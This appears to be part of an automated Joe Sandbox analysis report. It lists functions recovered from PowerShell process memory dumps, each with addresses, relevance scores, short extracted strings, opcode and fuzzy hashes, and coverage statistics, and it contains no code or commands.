                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tPp$tPp
                                                                                                    • API String ID: 0-1160507146
                                                                                                    • Opcode ID: 4d930b0f586ee3e6892813716be414bce667925c2605ec0f40339d23bfcb0050
                                                                                                    • Instruction ID: 60280b8b7ee73d500fe808b4365e0cac36d4fa6e18b6b647e7b9414b6fc9ab73
                                                                                                    • Opcode Fuzzy Hash: 4d930b0f586ee3e6892813716be414bce667925c2605ec0f40339d23bfcb0050
                                                                                                    • Instruction Fuzzy Hash: 13012B31B44311AFCF21AA589840BAAFB63AB85350F24419BDE459F381C7715C02C7D5
                                                                                                    Function 05D100A0 Relevance: 1.4, Instructions: 1430COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a28a4d5fb98bd663b5a3da25893587517fe8275a7fd83c688e221568e8a16b91
                                                                                                    • Instruction ID: 813e35ea9846518d920740938f1de0e9146e34f2928ec3f12004f2a7bdd37b3e
                                                                                                    • Opcode Fuzzy Hash: a28a4d5fb98bd663b5a3da25893587517fe8275a7fd83c688e221568e8a16b91
                                                                                                    • Instruction Fuzzy Hash: 21E2E774A00215AFD764DB69C990A69F7B2FB89310F14C1AADC1E9B741DB31ED82CF90
                                                                                                    Function 068147F0 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p
                                                                                                    • API String ID: 0-481844870
                                                                                                    • Opcode ID: 38ebc89caf0268babf53de635fefb8d75d8a9917e4b4dbb39c69e0aa083c8d36
                                                                                                    • Instruction ID: 5036738e01aa0aa437048712cddb7637046eeb7d50ae7ee6496855bda0e7bc4c
                                                                                                    • Opcode Fuzzy Hash: 38ebc89caf0268babf53de635fefb8d75d8a9917e4b4dbb39c69e0aa083c8d36
                                                                                                    • Instruction Fuzzy Hash: 8721AC30E00209CFDBA49F29C560B6EB7E9AF85355F18816AD508CF264D775C881CBD1
                                                                                                    Function 05D1007F Relevance: 1.3, Instructions: 1310COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 384077f65823bb537964322f78c075f4939a3fae3660e772e18b7baede3037b3
                                                                                                    • Instruction ID: 704dded6350b3e519806479ffefdc9960cee62f0e53dcfddc8fa7f6e4801b772
                                                                                                    • Opcode Fuzzy Hash: 384077f65823bb537964322f78c075f4939a3fae3660e772e18b7baede3037b3
                                                                                                    • Instruction Fuzzy Hash: 5AD2D474A00615EFDB64DB64C990AA9F7B2FB89310F14C1AADC2A97741D731ED82CF90
                                                                                                    Function 02F05E40 Relevance: .3, Instructions: 307COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ebe87c339a555723d8c8854b058de387769e2862a347343e680f5296a1ea93bc
                                                                                                    • Instruction ID: e65833152d59b63f903c3277c6a14372a74e1f5399c2e4f86f4c6f4bf29380cb
                                                                                                    • Opcode Fuzzy Hash: ebe87c339a555723d8c8854b058de387769e2862a347343e680f5296a1ea93bc
                                                                                                    • Instruction Fuzzy Hash: EED10534E012089FDB05CFA8D584A9DBBB6FF88350F248159E905AB3A6C771ED81CF90
                                                                                                    Function 02F08E28 Relevance: .2, Instructions: 221COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba40a85acd6f2b977d781525450b7c7c045c15e0ca621f3d4a22a2aa83fde847
                                                                                                    • Instruction ID: f140f7870ff9b19892761f72373b8af4ede070db19f723eb036c194fb144199c
                                                                                                    • Opcode Fuzzy Hash: ba40a85acd6f2b977d781525450b7c7c045c15e0ca621f3d4a22a2aa83fde847
                                                                                                    • Instruction Fuzzy Hash: 59816A3190A7919FC703DF2CD8A05D9BFB1EF46214B1A01C7C0D4DB2A3D625AE59CBA6
                                                                                                    Function 02F09BA2 Relevance: .2, Instructions: 195COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8b2f05a390fef755a373eda383f005c13e7f839a57c040fe296c96fee0e55ba3
                                                                                                    • Instruction ID: dd0c4ab31711d782a7d0c9ec6a05ce7d17e67bc9a4a30ab1e726ba3f9a2750e6
                                                                                                    • Opcode Fuzzy Hash: 8b2f05a390fef755a373eda383f005c13e7f839a57c040fe296c96fee0e55ba3
                                                                                                    • Instruction Fuzzy Hash: 5F71CF319093918FCB06DF6CC8A069ABFB1EF46314B2941D7C4D48B2A7E235D956CBA1
                                                                                                    Function 02F0A2D1 Relevance: .1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6662ee8ee97242ac7ea386ba98011faf5a1166a1dfe9834625863874cb58766
                                                                                                    • Instruction ID: 3b90dd4aa51c76b7c4c10643cb7dad4f9163aabacd4686536fab71c71b51c6ce
                                                                                                    • Opcode Fuzzy Hash: e6662ee8ee97242ac7ea386ba98011faf5a1166a1dfe9834625863874cb58766
                                                                                                    • Instruction Fuzzy Hash: 1551B834A00209EFDB05DF98D584A9DFBB2FF88314F248559E905AB3A5C772ED81DB50
                                                                                                    Function 05D1F474 Relevance: .1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78da9192f3a5368504c29989568f64f0fd9a101f563265a4c3425852cc4c37b7
                                                                                                    • Instruction ID: 75d27ff5153f94e1f3b2d660b9b1b49c5bebfe10ab4d9528d061b0acd5e4a381
                                                                                                    • Opcode Fuzzy Hash: 78da9192f3a5368504c29989568f64f0fd9a101f563265a4c3425852cc4c37b7
                                                                                                    • Instruction Fuzzy Hash: DB41E571A04202EFDB20DF29E941E7ABBB2BF81254F5880ABDD15AB261D735C841C779
                                                                                                    Function 02F0317D Relevance: .1, Instructions: 113COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 36b2b5c4a372a99de9fbea3656e80df9621aa11efb56344342d254e750011702
                                                                                                    • Instruction ID: 066c87678e752050ba06130ce3f9fff1af2c7bf1d93bfeb9dd049e638c135437
                                                                                                    • Opcode Fuzzy Hash: 36b2b5c4a372a99de9fbea3656e80df9621aa11efb56344342d254e750011702
                                                                                                    • Instruction Fuzzy Hash: F451B834A00208DFDB15CB98D484A9DFBF2BF88354F298199E405AB3A5C775ED82CB90
                                                                                                    Function 02F060F3 Relevance: .1, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40c58bd08d75fe9abce8ba683a69284dae51b63a300e83e0d7a15ff9aa09b8d9
                                                                                                    • Instruction ID: ccf60b413a20a4f021fed1f85de44804334fcdb585da8d3bf74d8a59905bd3f4
                                                                                                    • Opcode Fuzzy Hash: 40c58bd08d75fe9abce8ba683a69284dae51b63a300e83e0d7a15ff9aa09b8d9
                                                                                                    • Instruction Fuzzy Hash: 8341F334E01208DFDB05CBA8D584A9DFBB2AF88304F248558E405AB3A5CB71ED82CF80
                                                                                                    Function 02F08DF7 Relevance: .1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e68baac9a549ee028b23f2a9d36c06ca90d7e71732e5b89c6ea0ad66e3b49d8c
                                                                                                    • Instruction ID: 1a5abd5a7c3b8d7c77117bad2ec77aca3133ac2d3c3a83700a92d1cd12d901f8
                                                                                                    • Opcode Fuzzy Hash: e68baac9a549ee028b23f2a9d36c06ca90d7e71732e5b89c6ea0ad66e3b49d8c
                                                                                                    • Instruction Fuzzy Hash: 9B418F75A002059FCB15DF5CC9909AAFBF2FF49350B254195D558AB392C331FD81CBA0
                                                                                                    Function 02F0A3F0 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 745f2420f3faecf66dc77afccd6dc4fefdf46a72fef02220684a778bd7c108d5
                                                                                                    • Instruction ID: 8c2faf536b05bf242f09e31d34bdde4d5404ea48ba1f0eb97104d56f0d83acc8
                                                                                                    • Opcode Fuzzy Hash: 745f2420f3faecf66dc77afccd6dc4fefdf46a72fef02220684a778bd7c108d5
                                                                                                    • Instruction Fuzzy Hash: F911D735A00209EFDB05CFA8D884E9DFBB2FF48314F288158E505AB3A5C772E981DB40
                                                                                                    Function 02F0327B Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15e8ab3cac7250521586310c753f12b928ccb31c72cb40354ccaa6c5ab15df1f
                                                                                                    • Instruction ID: 3a8f7642dcd7870de6d5006378ea6c17b42e4273f237472df130f07bfa06ec52
                                                                                                    • Opcode Fuzzy Hash: 15e8ab3cac7250521586310c753f12b928ccb31c72cb40354ccaa6c5ab15df1f
                                                                                                    • Instruction Fuzzy Hash: 0411FB35A00208EFDB45CBA8D484B9DFBF1BF49314F298158E405AB3A5C771ED82CB90
                                                                                                    Function 02F061CC Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf5304db5959e8e913985162f3dc23551525ec01ea1adf684b2183b9307e9b79
                                                                                                    • Instruction ID: 3c9a9968e4165feaaa7fa5cdda8dd13977ee955c02ffe077011c240a90fac2cc
                                                                                                    • Opcode Fuzzy Hash: bf5304db5959e8e913985162f3dc23551525ec01ea1adf684b2183b9307e9b79
                                                                                                    • Instruction Fuzzy Hash: 8E11D435E01209DFEB45CBA8D484A9DFBB6AF48314F24C559E405AB3A5C771ED86CF80
                                                                                                    Function 02D6D01D Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2223470177.0000000002D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2d6d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94c40dc6bfb610269300cf261df92948fcbab3b6c8e2e648037e5a607ae0aef9
                                                                                                    • Instruction ID: 0d72b32b795436a239d9853163abbbcba6eed71f3a8841df90f3317ece4858e4
                                                                                                    • Opcode Fuzzy Hash: 94c40dc6bfb610269300cf261df92948fcbab3b6c8e2e648037e5a607ae0aef9
                                                                                                    • Instruction Fuzzy Hash: 7A01A7716043409BE7204A29DCC8777BF99EF85324F28855AED444B386C379DD45C6B1
                                                                                                    Function 02D6D005 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2223470177.0000000002D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2d6d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 76003d2f010df7c211d6b091ea12c4ad89f66534677baf73337245ca63bdc60b
                                                                                                    • Instruction ID: ed32db23c029781be457d11afce3a73c54731c91c8c51e765c895b312ebc6870
                                                                                                    • Opcode Fuzzy Hash: 76003d2f010df7c211d6b091ea12c4ad89f66534677baf73337245ca63bdc60b
                                                                                                    • Instruction Fuzzy Hash: 6C01526210E3C05FD7128B259C94766BFB4DF47224F1D81DBD8848F2A7C2699C45C772
                                                                                                    Function 02F04ECE Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e334a1d00e3588c771609a61934abe0b860ca42ff02a596655af05221d185b94
                                                                                                    • Instruction ID: 95bbf54f169978c4e0600a9f10ccfaefe3e34d29318642b53cdc9050e256f9c3
                                                                                                    • Opcode Fuzzy Hash: e334a1d00e3588c771609a61934abe0b860ca42ff02a596655af05221d185b94
                                                                                                    • Instruction Fuzzy Hash: D2F0D435A001099FCB15CF9CD8A0AEEF7B1FF88324F208159E615A72A1C736EC52CB60
                                                                                                    Function 05D1DD7E Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94dcd9c3417ddde5a739424659c7a71515f3d8112e2138e887bec7be57352bee
                                                                                                    • Instruction ID: ed9212e284bc535bd5cb35e0ba834c0601072aa51440e58c1277253292bfc75c
                                                                                                    • Opcode Fuzzy Hash: 94dcd9c3417ddde5a739424659c7a71515f3d8112e2138e887bec7be57352bee
                                                                                                    • Instruction Fuzzy Hash: 5DD01271B08151DBC610DA68E440469F3E1EB9931532485EBD95997241D7729C139785

                                                                                                    Non-executed Functions

                                                                                                    Function 02F0499D Relevance: 16.4, Strings: 13, Instructions: 176COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$\
                                                                                                    • API String ID: 0-3025743958
                                                                                                    • Opcode ID: 00b01772acef3ca3d183bbe7ce405a793af1f10e290dd63153903614297b78ee
                                                                                                    • Instruction ID: 108631dba0ded44089621f76dd90b6413922481e81e60220e1c8bb2170b9355b
                                                                                                    • Opcode Fuzzy Hash: 00b01772acef3ca3d183bbe7ce405a793af1f10e290dd63153903614297b78ee
                                                                                                    • Instruction Fuzzy Hash: E251DA4285FBE06FD7176B786CB10D63FB0AC2329471A02D3D5E4CE0A7D108899ED7A6
                                                                                                    Function 05D1EAF8 Relevance: 9.2, Strings: 7, Instructions: 471COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$tPp$tPp$$p$$p$$p
                                                                                                    • API String ID: 0-1066480243
                                                                                                    • Opcode ID: 0def7e33f4c8846a11c85fc6109f1f3da142a93e4179462d552b38622d405ada
                                                                                                    • Instruction ID: b9fcbb54f876427829b6931cd0f2e074e7c95ffede0cd3fbb8eb10ffbd921419
                                                                                                    • Opcode Fuzzy Hash: 0def7e33f4c8846a11c85fc6109f1f3da142a93e4179462d552b38622d405ada
                                                                                                    • Instruction Fuzzy Hash: 38F12631B04205AFCB149B69A8017AAFFAAFFC5210F18807BDD56DB351DB32C945C7A5
                                                                                                    Function 05D1D2A0 Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$tPp$$p$$p
                                                                                                    • API String ID: 0-2410924553
                                                                                                    • Opcode ID: 60974bf57b9d556f0054a706a1e47bfa993ebae9fe08df206260e2dd79483ee8
                                                                                                    • Instruction ID: ac542e58ca2ae4df9ff8b66ffaf55ffee3a999258cc75f16d9564d6c2fe121cf
                                                                                                    • Opcode Fuzzy Hash: 60974bf57b9d556f0054a706a1e47bfa993ebae9fe08df206260e2dd79483ee8
                                                                                                    • Instruction Fuzzy Hash: 10319F31A04204FFDB28EE44E941B6AB7A3BF85320F18C15BEC565F255C776E881CB99
                                                                                                    Function 068123E0 Relevance: 5.1, Strings: 4, Instructions: 146COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$84'l$tPp
                                                                                                    • API String ID: 0-2383950911
                                                                                                    • Opcode ID: 5911ef04341d33c21c3674491cb88509033bf41b42c1d579eaab4712599f3117
                                                                                                    • Instruction ID: ee6ea3fd833f29468670801003448f71aa6721a4d5ef94d204f34afd910eda05
                                                                                                    • Opcode Fuzzy Hash: 5911ef04341d33c21c3674491cb88509033bf41b42c1d579eaab4712599f3117
                                                                                                    • Instruction Fuzzy Hash: 2C516130E00208DFDBB4CE08D565BAEB7E9AB88354F148065DA15AF295C7B1DAC0CB91
                                                                                                    Function 06811AE8 Relevance: 5.1, Strings: 4, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$84'l$tPp
                                                                                                    • API String ID: 0-2383950911
                                                                                                    • Opcode ID: 34cac86c43bb51c49e52a26328e90fa05dc1560380eedc46b36ca699da33d065
                                                                                                    • Instruction ID: 4a34ec38f8f4a479b54b71e9d0e927b212be46b89598885ecc0e79fa467ec065
                                                                                                    • Opcode Fuzzy Hash: 34cac86c43bb51c49e52a26328e90fa05dc1560380eedc46b36ca699da33d065
                                                                                                    • Instruction Fuzzy Hash: 78516C30E00209CFDBA4CE14C549BAEB7EAAF84355F1880AADB85EF250D771D980CB91
                                                                                                    Function 05D19338 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84'l$84'l$tPp$tPp
                                                                                                    • API String ID: 0-2623685788
                                                                                                    • Opcode ID: ba826b52dc770c9dd883b12ce87d685d0f605e35da1cde3bf0d712fa73b10e64
                                                                                                    • Instruction ID: ed9a5f4ea272dc56e4b408885bffcf6a5b02e173b52231d9e36871e26955d88d
                                                                                                    • Opcode Fuzzy Hash: ba826b52dc770c9dd883b12ce87d685d0f605e35da1cde3bf0d712fa73b10e64
                                                                                                    • Instruction Fuzzy Hash: 81312930A05244AFC7159B68D831B2ABFB2BB85310F18809BD945AF393DA71DC01C796
                                                                                                    Function 06810C90 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $p$$p$$p$$p
                                                                                                    • API String ID: 0-3121760203
                                                                                                    • Opcode ID: 57f1290523bd5629444aeca35becd97b740deaddb84360a012fb88c78e0e1ea1
                                                                                                    • Instruction ID: be720c01eb715c07b54531ec8d712721d7e48547a53d140026f313153ec54089
                                                                                                    • Opcode Fuzzy Hash: 57f1290523bd5629444aeca35becd97b740deaddb84360a012fb88c78e0e1ea1
                                                                                                    • Instruction Fuzzy Hash: 4D2177317002445BEBB4566A9C41F2FB79EAFC0314F24842AEA09CF385DE79D8C1C761
                                                                                                    Function 0681152A Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$$p$$p
                                                                                                    • API String ID: 0-377911355
                                                                                                    • Opcode ID: 1f003a9d9b6a804e9d080a99bb219e52e80016949f4e71286841c8bb99f92515
                                                                                                    • Instruction ID: 51f5c6e93fd6bc25af05812c824b9468fb793897fa9fdd17c3719237e82d6693
                                                                                                    • Opcode Fuzzy Hash: 1f003a9d9b6a804e9d080a99bb219e52e80016949f4e71286841c8bb99f92515
                                                                                                    • Instruction Fuzzy Hash: 4F01D110B0D3C54FCB2B122868212696F764FC264072A41DBC292EF7A6DD998C0687A6

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:0.7%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:68
                                                                                                    Total number of Limit Nodes:2
